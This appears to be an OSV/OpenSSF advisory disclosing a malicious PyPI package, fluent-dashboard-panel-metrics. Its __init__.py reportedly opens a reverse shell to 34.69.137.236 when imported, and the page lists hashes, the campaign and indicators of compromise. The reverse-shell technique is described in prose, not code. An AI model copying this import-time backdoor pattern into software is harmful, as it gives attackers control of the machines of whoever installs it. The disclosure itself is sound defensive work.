MAL-2026-6233
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fluent-dashboard-panel-metrics/MAL-2026-6233.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6233
- Published
- 2026-06-20T01:07:05Z
- Modified
- 2026-06-20T03:31:00.636601707Z
- Summary
- Malicious code in fluent-dashboard-panel-metrics (PyPI)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153)
fluentpanelmetrics/init.py defines an undocumented function
_bootstrap_runtime_profile()and invokes it unconditionally at module top level. The function opens a TCP socket to 34.69.137.236 on port 80/443, duplicates the socket file descriptor over stdin/stdout/stderr via os.dup2, and execs/bin/sh -ivia subprocess.call, handing an interactive shell to the remote endpoint. The function is not listed in__all__and is not referenced in the README, which advertises the package as a dashboard panel/grid helper (PanelGrid, normalizemargin, scaleforbreakpoint, panelversion). Any process that imports this package — including build systems, test runners, or downstream applications — will establish a reverse shell to the attacker on a default install + import. The advertised functionality is cover for a backdoor; the package's only install-relevant effect is remote attacker access.Source: kam193 (7b6ebe4856f2e752a8a410e04066fe9549c08c220567169c2a50f9d50a328031)
During import, the package starts a reverse shell.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-acme-widget-layout-utils
Reasons (based on the campaign):
- The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
- Database specific
{ "malicious-packages-origins": [ { "sha256": "7b6ebe4856f2e752a8a410e04066fe9549c08c220567169c2a50f9d50a328031", "source": "kam193", "modified_time": "2026-06-20T01:07:05.776226Z", "versions": [ "0.1.0" ], "id": "pypi/2026-06-acme-widget-layout-utils/fluent-dashboard-panel-metrics", "import_time": "2026-06-20T01:50:18.846151341Z" }, { "sha256": "9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153", "source": "amazon-inspector", "modified_time": "2026-06-20T03:10:32Z", "id": "IN-MAL-2026-007089", "versions": [ "0.1.0" ], "import_time": "2026-06-20T03:14:16.688019942Z" } ], "iocs": { "ips": [ "34.69.137.236" ] } }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- Kamil Mańkowski (kam193) - REPORTER
-
Affected packages
PyPI / fluent-dashboard-panel-metrics
Package
- Name
- fluent-dashboard-panel-metrics
- View open source insights on deps.dev
- Purl
- pkg:pypi/fluent-dashboard-panel-metrics
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fluent-dashboard-panel-metrics/MAL-2026-6233.json"
indicators
{
"evidence_files": [
{
"sha256": "4be270eb047f8f6bed6bd8d162034d0d70546d95583b00fab187200cea6e8e3b",
"tlsh": "6431ed56ed34d5abd573da2628d3a0427b1669831a8824bb3fbcc3241f130a756f1dec",
"path": "fluent_panel_metrics/__init__.py"
}
],
"package_integrity": [
{
"hashes": {
"sha256": "d75fd47e46d3c77e115620b5b5cac689c4081dff7db9838f8d783884450d1435",
"blake2b_256": "861504c9b7fbe2b6f595ee8ee4fda691b74c96083a79711f9e5e05d05f57c370",
"md5": "8e5171bd7cc73d981c83bdc9f042db86"
},
"filename": "fluent_dashboard_panel_metrics-0.1.0-py3-none-any.whl"
}
]
}